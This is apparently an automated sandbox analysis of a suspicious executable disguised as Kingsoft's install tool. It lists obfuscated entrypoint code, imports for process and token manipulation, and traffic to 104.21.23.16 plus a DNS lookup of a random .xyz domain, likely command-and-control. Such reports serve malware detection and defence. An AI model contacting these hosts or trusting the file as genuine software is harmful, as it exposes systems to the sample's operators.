                                                                                                                                          OS Version Major:4
                                                                                                                                          OS Version Minor:0
                                                                                                                                          File Version Major:4
                                                                                                                                          File Version Minor:0
                                                                                                                                          Subsystem Version Major:4
                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                          Import Hash:c2a155c9804444dcd203f52770b81b7a

                                                                                                                                          Authenticode Signature

                                                                                                                                          Signature Valid:
                                                                                                                                          Signature Issuer:
                                                                                                                                          Signature Validation Error:
                                                                                                                                          Error Number:
                                                                                                                                          Not Before, Not After
                                                                                                                                            Subject Chain
                                                                                                                                              Version:
                                                                                                                                              Thumbprint MD5:
                                                                                                                                              Thumbprint SHA-1:
                                                                                                                                              Thumbprint SHA-256:
                                                                                                                                              Serial:

                                                                                                                                              Entrypoint Preview

                                                                                                                                              Instruction
                                                                                                                                              push ebp
                                                                                                                                              mov ebp, esp
                                                                                                                                              sub ebp, 18h
                                                                                                                                              mov dword ptr [ebp-14h], 00494DD9h
                                                                                                                                              push ebx
                                                                                                                                              mov ebx, 0000002Fh
                                                                                                                                              sub ebx, 00000000h
                                                                                                                                              add ebx, dword ptr [ebp-14h]
                                                                                                                                              push ebx
                                                                                                                                              ret
                                                                                                                                              mov ebx, dword ptr [edx]
                                                                                                                                              mov ecx, edi
                                                                                                                                              inc esi
                                                                                                                                              call eax
                                                                                                                                              mov edx, edi
                                                                                                                                              mov ebp, edi
                                                                                                                                              mov ebx, esi
                                                                                                                                              call edx
                                                                                                                                              mov ecx, dword ptr [esi]
                                                                                                                                              pop ebx
                                                                                                                                              push 00000004h
                                                                                                                                              push ebx
                                                                                                                                              mov ebx, 00000050h
                                                                                                                                              sub ebx, 00000000h
                                                                                                                                              add ebx, dword ptr [ebp-14h]
                                                                                                                                              push ebx
                                                                                                                                              ret
                                                                                                                                              mov edx, esi
                                                                                                                                              mov eax, esp
                                                                                                                                              mov edx, dword ptr [ebx]
                                                                                                                                              mov edi, ebp
                                                                                                                                              mov esi, ebp
                                                                                                                                              call edi
                                                                                                                                              pop esi
                                                                                                                                              pop ebx
                                                                                                                                              mov eax, 0049515Bh
                                                                                                                                              push ebx
                                                                                                                                              mov ebx, 00000075h
                                                                                                                                              sub ebx, 00000000h
                                                                                                                                              add ebx, dword ptr [ebp-14h]
                                                                                                                                              push ebx
                                                                                                                                              ret
                                                                                                                                              jmp eax
                                                                                                                                              mov esp, edi
                                                                                                                                              push esi
                                                                                                                                              inc dword ptr [edx]
                                                                                                                                              call edx
                                                                                                                                              push ebp
                                                                                                                                              mov esi, esp
                                                                                                                                              call esi
                                                                                                                                              pop ebx
                                                                                                                                              push eax
                                                                                                                                              push ebx
                                                                                                                                              mov ebx, 00000093h
                                                                                                                                              sub ebx, 00000000h
                                                                                                                                              add ebx, dword ptr [ebp-14h]
                                                                                                                                              push ebx
                                                                                                                                              ret
                                                                                                                                              dec edx
                                                                                                                                              mov ebx, dword ptr [eax]
                                                                                                                                              test eax, eax
                                                                                                                                              call ecx
                                                                                                                                              mov edx, ebp
                                                                                                                                              mov ecx, eax
                                                                                                                                              pop ebx
                                                                                                                                              push 000013C5h
                                                                                                                                              push ebx
                                                                                                                                              mov ebx, 000000BBh
                                                                                                                                              sub ebx, 00000000h
                                                                                                                                              add ebx, dword ptr [ebp-14h]
                                                                                                                                              push ebx
                                                                                                                                              ret
                                                                                                                                              mov edi, esi
                                                                                                                                              mov ebp, esi
                                                                                                                                              mov edi, ebx
                                                                                                                                              pop ecx
                                                                                                                                              mov esp, esi
                                                                                                                                              mov edx, edi
                                                                                                                                              mov ebp, eax
                                                                                                                                              mov edi, esi
                                                                                                                                              mov edx, dword ptr [eax]
                                                                                                                                              pop ebx
                                                                                                                                              push 0049598Fh
                                                                                                                                              push ebx
                                                                                                                                              mov ebx, 000000E0h

                                                                                                                                              Rich Headers

                                                                                                                                              Programming Language:
                                                                                                                                              • [RES] VS2005 build 50727
                                                                                                                                              • [ C ] VS2005 build 50727
                                                                                                                                              • [LNK] VS2005 build 50727
                                                                                                                                              • [C++] VS2005 build 50727
                                                                                                                                              • [ASM] VS2005 build 50727

                                                                                                                                              Data Directories

                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x1038000x104.rdata
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1120000x18dd4.rsrc
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x1260000x2310.rsrc
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0xc64200x1c.rdata
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xfdd000x40.rdata
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0xc60000x37c.rdata
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x1036d40x40.rdata
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                              Sections

                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                              .text0x10000xc4afc0xc5000False0.546581287674data6.76152862192IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                              .rdata0xc60000x3ebee0x3f000False0.385079520089data5.53283110669IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                              .data0x1050000xc9440x8000False0.456268310547data4.86264952816IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                              .rsrc0x1120000x18dd40x19000False0.336767578125data5.46879328933IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                              Resources

                                                                                                                                              NameRVASizeTypeLanguageCountry
                                                                                                                                              RT_ICON0x1121f00x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0ChineseChina
                                                                                                                                              RT_ICON0x122a180x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 65279, next used block 4286513152ChineseChina
                                                                                                                                              RT_ICON0x126c400x25a8dataChineseChina
                                                                                                                                              RT_ICON0x1291e80x10a8dataChineseChina
                                                                                                                                              RT_ICON0x12a2900x468GLS_BINARY_LSB_FIRSTChineseChina
                                                                                                                                              RT_GROUP_ICON0x12a6f80x4cdataChineseChina
                                                                                                                                              RT_VERSION0x12a7440x368dataChineseChina
                                                                                                                                              RT_MANIFEST0x12aaac0x325ASCII text, with very long lines, with CRLF line terminatorsEnglishUnited States

                                                                                                                                              Imports

                                                                                                                                              DLLImport
                                                                                                                                              KERNEL32.dllWriteFile, SetEndOfFile, GetTickCount, GetWindowsDirectoryW, FindClose, GetProcAddress, GetSystemDirectoryW, GetVersionExW, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, OpenProcess, LoadLibraryW, LocalAlloc, LocalFree, GetCurrentProcess, GetLocalTime, GetSystemInfo, InterlockedCompareExchange, FileTimeToSystemTime, FileTimeToLocalFileTime, GetUserDefaultLangID, DeviceIoControl, CreateFileA, LoadLibraryA, OpenMutexW, CreateDirectoryW, OpenSemaphoreW, GetCurrentProcessId, ProcessIdToSessionId, ExpandEnvironmentStringsW, Sleep, CreateProcessW, GetSystemTime, SetUnhandledExceptionFilter, CreateThread, SetEvent, GetLogicalDriveStringsW, QueryDosDeviceW, lstrcpyW, lstrcatW, GetModuleHandleA, GetVersion, GetFileType, GetStdHandle, QueryPerformanceCounter, GlobalMemoryStatus, FlushConsoleInputBuffer, GetCurrentDirectoryA, GetFullPathNameA, FindFirstFileA, GetDriveTypeA, ExpandEnvironmentStringsA, FormatMessageA, GetSystemDirectoryA, SleepEx, SetEnvironmentVariableA, CompareStringW, GetFileAttributesW, CreateFileW, ReadFile, DeleteFileW, SetFilePointer, lstrlenA, WideCharToMultiByte, TerminateThread, WaitForSingleObject, LeaveCriticalSection, MultiByteToWideChar, InterlockedDecrement, InterlockedIncrement, DeleteCriticalSection, lstrcmpiW, GetCurrentThreadId, FindResourceExW, InitializeCriticalSection, UnmapViewOfFile, LockResource, CloseHandle, FreeLibrary, LoadLibraryExW, MapViewOfFileEx, EnterCriticalSection, GetModuleFileNameW, FindResourceW, CreateFileMappingW, LoadResource, GetModuleHandleW, SizeofResource, GetLastError, lstrlenW, RaiseException, OpenEventW, CompareStringA, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, GetLocaleInfoW, GetStringTypeW, GetStringTypeA, IsValidLocale, EnumSystemLocalesA, GetUserDefaultLCID, SetStdHandle, FlushFileBuffers, GetCommandLineW, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetEnvironmentStrings, FreeEnvironmentStringsA, GetConsoleCP, GetTimeZoneInformation, GetStartupInfoA, SetHandleCount, IsValidCodePage, GetOEMCP, SetLastError, TlsFree, TlsSetValue, TlsAlloc, TlsGetValue, GetModuleFileNameA, HeapCreate, VirtualAlloc, VirtualFree, GetCPInfo, LCMapStringW, LCMapStringA, RtlUnwind, GetConsoleMode, SetConsoleMode, ReadConsoleInputA, SetConsoleCtrlHandler, GetStartupInfoW, ExitProcess, InterlockedExchange, GetVersionExA, GetACP, GetLocaleInfoA, GetThreadLocale, HeapDestroy, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, GetProcessHeap, ExitThread, TerminateProcess, UnhandledExceptionFilter, IsDebuggerPresent, GetSystemTimeAsFileTime, VirtualQuery
                                                                                                                                              USER32.dllCharNextW, DestroyWindow, UnregisterClassA, GetUserObjectInformationW, GetProcessWindowStation, MessageBoxA
                                                                                                                                              ADVAPI32.dllRegisterEventSourceA, ReportEventA, DeregisterEventSource, CreateProcessAsUserW, SetTokenInformation, DuplicateTokenEx, FreeSid, EqualSid, AllocateAndInitializeSid, GetTokenInformation, OpenProcessToken, RegOpenKeyW, RegQueryValueExW, RegEnumKeyExW, RegQueryInfoKeyW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegSetValueExW, RegCreateKeyExW, RegOpenKeyExW
                                                                                                                                              SHELL32.dllSHGetSpecialFolderPathW
                                                                                                                                              ole32.dllCoUninitialize, CoSetProxyBlanket, CoCreateInstance, CoTaskMemAlloc, CoTaskMemRealloc, CoTaskMemFree, CoInitializeEx
                                                                                                                                              OLEAUT32.dllVarUI4FromStr, SysFreeString, SysAllocString, VariantInit, VariantClear, SysStringLen
                                                                                                                                              SHLWAPI.dllPathRemoveFileSpecW, StrToIntW, PathFindFileNameW, PathFindExtensionW, PathFileExistsW, PathAddBackslashW
                                                                                                                                              VERSION.dllVerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
                                                                                                                                              WTSAPI32.dllWTSFreeMemory, WTSEnumerateSessionsW
                                                                                                                                              iphlpapi.dllIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                                                                              RPCRT4.dllUuidCreate
                                                                                                                                              PSAPI.DLLGetProcessImageFileNameW, GetModuleFileNameExW

                                                                                                                                              Version Infos

                                                                                                                                              DescriptionData
                                                                                                                                              LegalCopyrightCopyright (C) 1998-2015 Kingsoft Corporation
                                                                                                                                              InternalNameKInstallTool
                                                                                                                                              FileVersion2015,09,24,14384
                                                                                                                                              CompanyNameKingsoft Corporation
                                                                                                                                              ProductNameKingsoft Internet Security
                                                                                                                                              ProductVersion9,3,252534,14384
                                                                                                                                              FileDescriptionKingsoft Install Tool
                                                                                                                                              OriginalFilenameKInstallTool.exe
                                                                                                                                              Translation0x0000 0x04b0

                                                                                                                                              Possible Origin

                                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                                              ChineseChina
                                                                                                                                              EnglishUnited States

                                                                                                                                              Network Behavior

                                                                                                                                              Network Port Distribution

                                                                                                                                              TCP Packets

                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                              Jan 29, 2021 10:57:39.227457047 CET4972580192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:57:39.273248911 CET8049725104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:57:39.273334980 CET4972580192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:57:39.274213076 CET4972580192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:57:39.274293900 CET4972580192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:57:39.320132017 CET8049725104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:57:39.320157051 CET8049725104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:57:39.961137056 CET8049725104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:57:39.976404905 CET4972580192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:57:39.976480961 CET4972580192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:57:40.022109985 CET8049725104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:57:40.022135019 CET8049725104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:57:41.399874926 CET8049725104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:57:41.454600096 CET4972580192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:57:41.489664078 CET4972580192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:57:41.489733934 CET4972580192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:57:41.535548925 CET8049725104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:57:41.535571098 CET8049725104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:57:44.276484966 CET8049725104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:57:44.329843998 CET4972580192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:57:46.477119923 CET4972580192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:57:46.477178097 CET4972580192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:57:46.524256945 CET8049725104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:57:46.524293900 CET8049725104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:57:50.713327885 CET8049725104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:57:50.814753056 CET4972580192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:57:53.938409090 CET4973080192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:57:53.984313011 CET8049730104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:57:53.984431982 CET4973080192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:57:53.984832048 CET4973080192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:57:53.984879017 CET4973080192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:57:54.030569077 CET8049730104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:57:54.030608892 CET8049730104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:57:54.944314003 CET4973180192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:57:54.990245104 CET8049731104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:57:54.990468979 CET4973180192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:57:54.991064072 CET4973180192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:57:54.991079092 CET4973180192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:57:55.036803007 CET8049731104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:57:55.036842108 CET8049731104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:57:56.412005901 CET4972580192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:57:58.149625063 CET8049730104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:57:58.268517971 CET4973080192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:58:01.071065903 CET8049731104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:58:01.268774033 CET4973180192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:58:02.347929001 CET4973180192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:58:02.348011971 CET4973180192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:58:02.393821001 CET8049731104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:58:02.393855095 CET8049731104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:58:06.584638119 CET8049731104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:58:06.701675892 CET4973180192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:58:07.034818888 CET4973080192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:58:07.034873962 CET4973080192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:58:07.081028938 CET8049730104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:58:07.081056118 CET8049730104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:58:08.430646896 CET8049730104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:58:08.430690050 CET8049730104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:58:08.430813074 CET4973080192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:58:08.452989101 CET4973080192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:58:08.453020096 CET4973080192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:58:08.498878002 CET8049730104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:58:08.498900890 CET8049730104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:58:09.826873064 CET4973180192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:58:14.426819086 CET8049730104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:58:14.466605902 CET4973080192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:58:14.787164927 CET4973080192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:58:14.787204027 CET4973080192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:58:14.834538937 CET8049730104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:58:14.834566116 CET8049730104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:58:14.834579945 CET8049730104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:58:16.177582979 CET8049730104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:58:16.211626053 CET4973080192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:58:16.211760998 CET4973080192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:58:16.258160114 CET8049730104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:58:16.258178949 CET8049730104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:58:20.519503117 CET8049730104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:58:20.522950888 CET4973080192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:58:20.568969965 CET8049730104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:58:21.874977112 CET8049730104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:58:21.875001907 CET8049730104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:58:21.875085115 CET4973080192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:58:38.902834892 CET4973080192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:58:38.903032064 CET4973080192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:58:38.948702097 CET8049730104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:58:38.948728085 CET8049730104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:58:43.088757992 CET8049730104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:58:43.131666899 CET4973080192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:58:49.145030022 CET4974680192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:58:49.191629887 CET8049746104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:58:49.191756964 CET4974680192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:58:49.195518970 CET4974680192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:58:49.241374016 CET8049746104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:58:50.595266104 CET8049746104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:58:50.595309019 CET8049746104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:58:50.595454931 CET4974680192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:58:51.336580038 CET4974680192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:58:51.382827997 CET8049746104.21.23.16192.168.2.3
                                                                                                                                              Jan 29, 2021 10:58:51.383044958 CET4974680192.168.2.3104.21.23.16
                                                                                                                                              Jan 29, 2021 10:58:54.363826990 CET4973080192.168.2.3104.21.23.16

                                                                                                                                              UDP Packets

                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                              Jan 29, 2021 10:57:28.339449883 CET6349253192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 10:57:28.390253067 CET53634928.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 10:57:29.558053017 CET6083153192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 10:57:29.614608049 CET53608318.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 10:57:30.708121061 CET6010053192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 10:57:30.759028912 CET53601008.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 10:57:31.902215004 CET5319553192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 10:57:31.950103998 CET53531958.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 10:57:33.576231956 CET5014153192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 10:57:33.627038002 CET53501418.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 10:57:35.344373941 CET5302353192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 10:57:35.392333031 CET53530238.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 10:57:36.503122091 CET4956353192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 10:57:36.550887108 CET53495638.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 10:57:37.649226904 CET5135253192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 10:57:37.697004080 CET53513528.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 10:57:38.863976955 CET5934953192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 10:57:38.914632082 CET53593498.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 10:57:39.154855013 CET5708453192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 10:57:39.214333057 CET53570848.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 10:57:40.797672987 CET5882353192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 10:57:40.848685980 CET53588238.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 10:57:42.325683117 CET5756853192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 10:57:42.373552084 CET53575688.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 10:57:43.513323069 CET5054053192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 10:57:43.573118925 CET53505408.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 10:57:53.872057915 CET5436653192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 10:57:53.928330898 CET53543668.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 10:57:54.856245041 CET5303453192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 10:57:54.918409109 CET53530348.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 10:57:56.574156046 CET5776253192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 10:57:56.632173061 CET53577628.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 10:58:07.886915922 CET5543553192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 10:58:07.934978008 CET53554358.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 10:58:16.634157896 CET5071353192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 10:58:16.690663099 CET53507138.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 10:58:17.408256054 CET5613253192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 10:58:17.467639923 CET53561328.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 10:58:17.799479008 CET5898753192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 10:58:17.853208065 CET53589878.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 10:58:18.302578926 CET5657953192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 10:58:18.350500107 CET53565798.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 10:58:30.349826097 CET6063353192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 10:58:30.410259008 CET53606338.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 10:58:39.352690935 CET6129253192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 10:58:39.435403109 CET53612928.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 10:58:49.066128969 CET6361953192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 10:58:49.123408079 CET53636198.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 10:58:58.339248896 CET6493853192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 10:58:58.387324095 CET53649388.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 10:58:58.785707951 CET6194653192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 10:58:58.844871044 CET53619468.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 10:59:21.013367891 CET6491053192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 10:59:21.064090014 CET53649108.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 11:00:13.656512022 CET5212353192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 11:00:13.707995892 CET53521238.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 11:00:14.237154961 CET5613053192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 11:00:14.288053036 CET53561308.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 11:00:15.067559004 CET5633853192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 11:00:15.132400036 CET53563388.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 11:00:15.510848045 CET5942053192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 11:00:15.567234039 CET53594208.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 11:00:15.980833054 CET5878453192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 11:00:16.037415028 CET53587848.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 11:00:16.480447054 CET6397853192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 11:00:16.537077904 CET53639788.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 11:00:16.975590944 CET6293853192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 11:00:17.034116983 CET53629388.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 11:00:17.576896906 CET5570853192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 11:00:17.636254072 CET53557088.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 11:00:18.326832056 CET5680353192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 11:00:18.383100986 CET53568038.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 11:00:18.762240887 CET5714553192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 11:00:18.818572044 CET53571458.8.8.8192.168.2.3

                                                                                                                                              DNS Queries

                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                              Jan 29, 2021 10:57:39.154855013 CET192.168.2.38.8.8.80xbbc6Standard query (0)84cfba021a5a6662.xyzA (IP address)IN (0x0001)
